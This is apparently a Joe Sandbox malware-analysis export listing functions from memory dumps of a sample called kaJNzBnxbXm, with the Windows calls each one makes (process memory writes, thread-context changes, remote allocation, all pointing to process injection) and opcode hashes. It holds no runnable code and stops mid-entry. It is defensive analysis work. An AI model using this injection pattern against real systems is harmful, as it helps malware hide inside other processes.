WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C2F728

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6f1c90197cd5b3563d4689ee8b0635d12af636c5502dc310cf425fd6a0b63dab
Instruction ID: b5852d82ddcb98f94acf5afd24b01e55ee18e6de2666e96373cf336f3220d9b7
Opcode Fuzzy Hash: 6f1c90197cd5b3563d4689ee8b0635d12af636c5502dc310cf425fd6a0b63dab
Instruction Fuzzy Hash: 792139B59003599FDB10CFA9C985BDEBBF5FF48310F108429E929A7250C7799940DB60

Uniqueness

Uniqueness Score: -1.00%

Function 06C2F698 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C2F728

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2f1b6a2e163b55cdfe25d1c9b0b823ae9432c2432bf94ee48ffaf55f0cfc4905
Instruction ID: 33eecc9fc1f4dff3cee8f53fecd7723a802d963a3fdb44bba109813b0cb3cddb
Opcode Fuzzy Hash: 2f1b6a2e163b55cdfe25d1c9b0b823ae9432c2432bf94ee48ffaf55f0cfc4905
Instruction Fuzzy Hash: 9B2127B59003599FDB10CFA9C985BDEBBF5FF48320F10842EE919A7250D7789944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A6D5B8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A6D647

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 34607c5836756ad8579c396d03f35484996295ec0f601d6298f06b6aad64aa4d
Instruction ID: 49cd7e981857ec7de9b04efcb80bb641661f64d93ec144a66ab58188b3dda95a
Opcode Fuzzy Hash: 34607c5836756ad8579c396d03f35484996295ec0f601d6298f06b6aad64aa4d
Instruction Fuzzy Hash: AA2107B5D002489FDB10CFAAD984ADEBFF5FB48320F14841AE918A3350C378A945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 06C2F782 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C2F808

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 05a5df3b7dfd20172b5e2a1de1ef592f2908827deef27af9aefbee3a1ce03146
Instruction ID: df224e49b50a1eab60308b20a86e88c1c299637febdf6a21b35bec9e02ee1ecd
Opcode Fuzzy Hash: 05a5df3b7dfd20172b5e2a1de1ef592f2908827deef27af9aefbee3a1ce03146
Instruction Fuzzy Hash: D92116B1D002599FDB10CFAAC885ADEFBF5FF48320F10842EE919A7250C7799941DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C2EC8A Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C2ED0E

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5f27572978ec56c87cac313068a9f02c41cfb11b711516356ad3f956b3f31cd1
Instruction ID: 04b97c3fd00d52b8b6770b23524234fcad74a533eab3675135b9ee1f31cc3f02
Opcode Fuzzy Hash: 5f27572978ec56c87cac313068a9f02c41cfb11b711516356ad3f956b3f31cd1
Instruction Fuzzy Hash: E3211AB5D003099FDB10DFAAC4857EEBBF4EF88324F148429D519A7240C778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C2F788 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C2F808

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d2c647816a7bae74870d738ddbe523dd6d90262b6087c118db4d35add801ac8a
Instruction ID: ab3dee2a1877a93f3defe5fafd1c8db6127711a73ead9aa2031457f39d9d924e
Opcode Fuzzy Hash: d2c647816a7bae74870d738ddbe523dd6d90262b6087c118db4d35add801ac8a
Instruction Fuzzy Hash: 842116B1D002599FCB10CFAAC881ADEFBF5FF48320F10842EE919A7250C7789900DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C2EC90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C2ED0E

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7ed31e5b5478d534999802b0bf375ef04800fa0d09a2c470aed09de202637663
Instruction ID: 7576574af0f9fee1e9f3ed16ac751099ab99d14fe28338aa915976d34ae3290b
Opcode Fuzzy Hash: 7ed31e5b5478d534999802b0bf375ef04800fa0d09a2c470aed09de202637663
Instruction Fuzzy Hash: 632118B1D003098FDB10DFAAC4857AEBBF4EF88324F14842AD919A7240C778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A6D5C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A6D647

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: def40c8baa5ca60b542c11245f0250df7922be076dbb9d638a70edfd37339e91
Instruction ID: e2adb3213dca6891f591d7e7771ac608b831ba2eb05e43f7e6d3aa0ce818a6fb
Opcode Fuzzy Hash: def40c8baa5ca60b542c11245f0250df7922be076dbb9d638a70edfd37339e91
Instruction Fuzzy Hash: 6F21B3B5D002499FDB10CF9AD984ADEBBF9EB48320F14841AE918A7350D374A944DF65

Uniqueness

Uniqueness Score: -1.00%

Function 06C2F19A Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C2F20E

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ae220654fa5306759be861108e35182774ec39c180a16e6e120305038be18aa2
Instruction ID: c08407c2f59e25c8d669db831c4932f969a786489f56434094dcc3738c3f2508
Opcode Fuzzy Hash: ae220654fa5306759be861108e35182774ec39c180a16e6e120305038be18aa2
Instruction Fuzzy Hash: 81116AB59002499FCB10CFAAC845BDFBFF5EF88320F248419E519A7250C775A940DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A6A0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A6AFB9,00000800,00000000,00000000), ref: 00A6B1CA

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d4f49ddf23c310766a14334dca30d3f0c38f32f7d835c14c458ebefd13803f7b
Instruction ID: 6f2058e5ac7e1ad3f2f122d65c919213e4332143e6f33e71706635ac195bf4a4
Opcode Fuzzy Hash: d4f49ddf23c310766a14334dca30d3f0c38f32f7d835c14c458ebefd13803f7b
Instruction Fuzzy Hash: A71114B69003499FDB10CF9AC844BDEFBF4EB89310F10852AE519A7200C375A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A6B159 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A6AFB9,00000800,00000000,00000000), ref: 00A6B1CA

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bce777deee4309463e5999c592c744949c550f1ec45d6fbf5a1f44f4cf8c0b83
Instruction ID: 51eeb2114dbdf1ef735ab6783aef4b98446a962a6f57c5a5cd72c66223f1b6b4
Opcode Fuzzy Hash: bce777deee4309463e5999c592c744949c550f1ec45d6fbf5a1f44f4cf8c0b83
Instruction Fuzzy Hash: B41114B68002499FDB10CF9AC844BDEFBF5EF89320F14852EE419A7610C379A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06C2F1A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C2F20E

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fa9c16a3a36020e505279a7d917dee2be333ad2c361c3ecc87afdbd6786730b7
Instruction ID: 3320a1d3fc06463c52295642d1677536c74710ac2eaf127510bfb08e14128c04
Opcode Fuzzy Hash: fa9c16a3a36020e505279a7d917dee2be333ad2c361c3ecc87afdbd6786730b7
Instruction Fuzzy Hash: A61137B59002499FCB10DFAAC845BDFBFF5EF88320F248419E519A7250C775A940DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C2EBDA Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C2EC42

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c864bd045be259c245b7ebcf2672fc9d00d6d388c01618682fdfcc4c067cdcc2
Instruction ID: 30e039c9c4061aeb3135231b7b05bc994394369166c83d3a2c1f9baf023e203b
Opcode Fuzzy Hash: c864bd045be259c245b7ebcf2672fc9d00d6d388c01618682fdfcc4c067cdcc2
Instruction Fuzzy Hash: 1A1158B1D003498FDB20DFAAC8457EEFFF9EB88324F248419D519A7240CB75A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C2EBE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C2EC42

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 33e463eff481465fa911ea12c8175c11faad3c285b4360a072abd2e3a731cdd1
Instruction ID: be5f7f1c5257de51528347059839b74fdc46b1ad68b8ddb7149ab6363bed9b9a
Opcode Fuzzy Hash: 33e463eff481465fa911ea12c8175c11faad3c285b4360a072abd2e3a731cdd1
Instruction Fuzzy Hash: D8113AB1D003498FDB20DFAAC44579EFFF5EF88324F248419D519A7240C775A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A6AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A6AF3E

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a25a8c2cd8bd9cab715e384a9dee4a03d9e7575ec89e426fc4ae4400704ad2d2
Instruction ID: 48fad14650aea234e12e12a86564fa56517be51cf6535f2e5dd19e0f01be5051
Opcode Fuzzy Hash: a25a8c2cd8bd9cab715e384a9dee4a03d9e7575ec89e426fc4ae4400704ad2d2
Instruction Fuzzy Hash: 25110FB6C006498FCB10CF9AC444A9EFBF4EB88324F10841AD419B7210C3B9A945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 04BE4CEC Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

Hjq, xrefs: 04BE6F0E

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: Hjq
API String ID: 0-3368716452
Opcode ID: 11b8d6fce6c31ebee401166a8075288c78e3530aa49787b21ccd2255ad1e5548
Instruction ID: 38cdb23088c00f300739b456e47fc59e814dda12ca1b87bec4a8a4e4ceaf33fc
Opcode Fuzzy Hash: 11b8d6fce6c31ebee401166a8075288c78e3530aa49787b21ccd2255ad1e5548
Instruction Fuzzy Hash: A24181B5A002089FDB14DFAAC484AAFBBF5EF98310F10846DE549E7350DB35AD45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04BEB910 Relevance: .7, Instructions: 729COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e551ea0414be106ff0d06327bcc8d8d7b291e671bec143f7ec9618829b192df4
Instruction ID: a3f3915683d1c6d69e0a9cdd2996b3e728c900edec6144b889c6326558e22432
Opcode Fuzzy Hash: e551ea0414be106ff0d06327bcc8d8d7b291e671bec143f7ec9618829b192df4
Instruction Fuzzy Hash: BA725031D10609CFDB14EF68C894AADBBB1FF85305F008699D549A7265EF30AAD9CF81

Uniqueness

Uniqueness Score: -1.00%

Function 04BE8890 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac713e329715d92beb16816065299a02e4fe6397fe1677aa302a155fb949af68
Instruction ID: bdb74de88b2bd3584b44d7a221dc1e1858f30ceb915103f5923ecd0e940eed1e
Opcode Fuzzy Hash: ac713e329715d92beb16816065299a02e4fe6397fe1677aa302a155fb949af68
Instruction Fuzzy Hash: C442D731E10A19CBDB15EF69C8846EDF7B1FF89304F1086A9D459B7261EB30AA95CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04BED598 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f5e6321e48fc17f1da61915c17cb0addff131557b69b732a06b2e8d1f32932e
Instruction ID: aaecc6c0d6a460b97d7b1fa148e5353186620294cf10adec8483f8ed4f03d039
Opcode Fuzzy Hash: 7f5e6321e48fc17f1da61915c17cb0addff131557b69b732a06b2e8d1f32932e
Instruction Fuzzy Hash: 94222734A00215CFDB14DF69C894BADB7B2FF88304F1486A9E54AAB365EB70AD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04BE8881 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 827a7a06cf6b3b07244215b35301ff64b8b269adc5469053d82fd12750bcba78
Instruction ID: 71e62d7c588caee3863fc4d114ba8901a9f3829f5448585fc3ab240ae846a764
Opcode Fuzzy Hash: 827a7a06cf6b3b07244215b35301ff64b8b269adc5469053d82fd12750bcba78
Instruction Fuzzy Hash: 1FE1E931E00A198FDB25EF69C8846EDB7B1FF89304F148699D419BB251EB30AE95CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04BEEB70 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afcf0acae7f88f4473a3aba268dd9d77e0ddfe6096ea260772405b3ca72e6952
Instruction ID: cec89d8bade7962d7d39ff37cc039a5555643b1d75bec28ce6ea53eda4168b9f
Opcode Fuzzy Hash: afcf0acae7f88f4473a3aba268dd9d77e0ddfe6096ea260772405b3ca72e6952
Instruction Fuzzy Hash: BCB16C70A00219DFDB05EBE9D894AADB7B2FFC8300F1485A5E505AB359EF70AD45DB80

Uniqueness

Uniqueness Score: -1.00%

Function 04BED1E0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce395153160646804d6770e846e3a1233eb445d70e87447d25abacf1962ed76b
Instruction ID: e9bf5224f2fe1bd7eca3c9d92f00ded9662788fa63eed05cf196b46a69a70b10
Opcode Fuzzy Hash: ce395153160646804d6770e846e3a1233eb445d70e87447d25abacf1962ed76b
Instruction Fuzzy Hash: 3AC10834E1061ACFCB14DF69C884AADB7B5FF89304F1186E9D449AB261EB70E985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04BED1B0 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7587357457290cebb76050bd745611fe3b41c79f8cab110118ae8dfc459eae60
Instruction ID: 0e1da170a32241d31406dbd5391ca5e2507c1e66aedff607eb83739c9a5c44b8
Opcode Fuzzy Hash: 7587357457290cebb76050bd745611fe3b41c79f8cab110118ae8dfc459eae60
Instruction Fuzzy Hash: 1DA1F834E1061A8FCB14DF69C884A9CB7B1FF89304F1586E9D449AB221EB70AA85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04BEB2A0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d573f7c183d4cb7b7d8dca1ae85c5c0af6ab7bdfa6512bcf6e1b1bc6408d5ee
Instruction ID: 1c832651587e92199e95398f96ef2ad5fdadd8a267aa6204dc45d871e8ecc620
Opcode Fuzzy Hash: 5d573f7c183d4cb7b7d8dca1ae85c5c0af6ab7bdfa6512bcf6e1b1bc6408d5ee
Instruction Fuzzy Hash: 9491FA7590060ADFCB41EF68C880999FBF5FF89310B14C79AE919AB255E770E985CF80

Uniqueness

Uniqueness Score: -1.00%

Function 04BEEB60 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d50644a3a9e4a80629eb446d0ab924239244b3bcb6dbb28f915fbec4f3ac3b
Instruction ID: d257eca6cf7d8a75b3bd89b07d95ee4c26c8e73a390e0d3cc8688f811d6f23c3
Opcode Fuzzy Hash: d5d50644a3a9e4a80629eb446d0ab924239244b3bcb6dbb28f915fbec4f3ac3b
Instruction Fuzzy Hash: 4E710E70A002198FDB04DFA9C894AEDB7B2FFC8304F1586A5E5056B269EB70FD45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04BEA621 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f070338bb2ec06f762eeca1e2296bd3fb99748e02f98f8b77b65f050cddd51
Instruction ID: 76c3ee0da61f55ed2e2d973d0023fa21892c027a670641fad43984ab3ddd657e
Opcode Fuzzy Hash: 63f070338bb2ec06f762eeca1e2296bd3fb99748e02f98f8b77b65f050cddd51
Instruction Fuzzy Hash: CD71BEB9600A00CFC718DF29C498959BBF2FF8931471589A9E54ACB372EB72EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04BEDC90 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e59b5f641e62a7d884c1a73f8f1848c982454d907ce7ec0ecc432065b3a758
Instruction ID: b0434a97be4878d673d380de480e88847091462afb4eddbe4502cdacd5864180
Opcode Fuzzy Hash: e4e59b5f641e62a7d884c1a73f8f1848c982454d907ce7ec0ecc432065b3a758
Instruction Fuzzy Hash: A1515C34B002158FDB18EF69C894AADBBF9FF89704B1444A9D506DB3A1DB75EC01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04BEA440 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e618e2661fb03622eb03262fd5843afc58b1ef21d04e95d7d34d49b2a5135e59
Instruction ID: fc4510e15f9dfb4a9fae4feaa37f28224ea718a83f672690ae9b08eb8fff8b4f
Opcode Fuzzy Hash: e618e2661fb03622eb03262fd5843afc58b1ef21d04e95d7d34d49b2a5135e59
Instruction Fuzzy Hash: F671A074A002068FCB44CF69D5849A9FBF5FF4C314B5986A9E80ADB316E734E885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04BE4330 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1558f1734e02799ce83ffd8eb8587631ad512f9059a5e5c9f1b68c3cd500a433
Instruction ID: c032ca8cc486d05fbb081852dde46c1c6a2d482a2ef158a548c760d350a03bcc
Opcode Fuzzy Hash: 1558f1734e02799ce83ffd8eb8587631ad512f9059a5e5c9f1b68c3cd500a433
Instruction Fuzzy Hash: 4C515175E00249AFDB14DFAAC848ABFBBF5EFC8314F10855AD515E7250EB74A901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04BEB291 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45be2bd5e0ca91a689e306e1dffb9ad79b47abcb7c0712d23ce26a5d949b9b7
Instruction ID: e4e2fa04d1ef39d8e7bbd95dfa9c5a2250db295ddf21c36da99404779c3862c0
Opcode Fuzzy Hash: d45be2bd5e0ca91a689e306e1dffb9ad79b47abcb7c0712d23ce26a5d949b9b7
Instruction Fuzzy Hash: 2E511971D1070ACFCB41EF69C884999F7B0FF89310B14879AE919EB255EB70E985CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04BE4D24 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d79f8dc682aee806b5ac87d44fce8ecd4268d4a2a3eedbfa3785c924dc68e04
Instruction ID: d06f7ef8c212589334a0a940977615bf2cc49e2e3741a99e8b399c60b0b87f84
Opcode Fuzzy Hash: 1d79f8dc682aee806b5ac87d44fce8ecd4268d4a2a3eedbfa3785c924dc68e04
Instruction Fuzzy Hash: 7A31BE30A02218EFCB18DFA5E5945ADFBB2FF89305F1184A9E49177251CB31AC65CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04BE9518 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31c612f7e39a9f105b43b90cd56e3d81e6712a4284b8a883361968b361bb8e2d
Instruction ID: b48855473bdc8c80677f0899a99e1cd031b5b655955b71a460e831c240fecde7
Opcode Fuzzy Hash: 31c612f7e39a9f105b43b90cd56e3d81e6712a4284b8a883361968b361bb8e2d
Instruction Fuzzy Hash: FD414F30A10709CFCB14EF78C8949EDBBB6FF89304F1085A9E5156B325EB71A956CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04BE9528 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

